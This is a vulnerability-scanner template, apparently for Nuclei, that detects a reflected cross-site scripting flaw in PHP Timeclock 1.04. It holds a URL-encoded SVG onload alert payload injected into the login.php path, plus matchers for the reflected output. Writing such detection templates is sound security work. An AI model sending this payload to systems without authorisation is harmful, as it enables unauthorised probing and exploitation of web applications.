id: php-timeclock-xss

info:
  name: PHP Timeclock 1.04 XSS
  author: pikpikcu
  severity: medium
  description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities
  reference: https://www.exploit-db.com/exploits/49853
  tags: xss,php,timeclock

requests:
  - method: GET
    path:
      - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<svg/onload=alert`{{randstr}}`>"
          - "PHP Timeclock Admin Login"
        part: body
        condition: and

      - type: word
        words:
          - "text/html"
        part: header
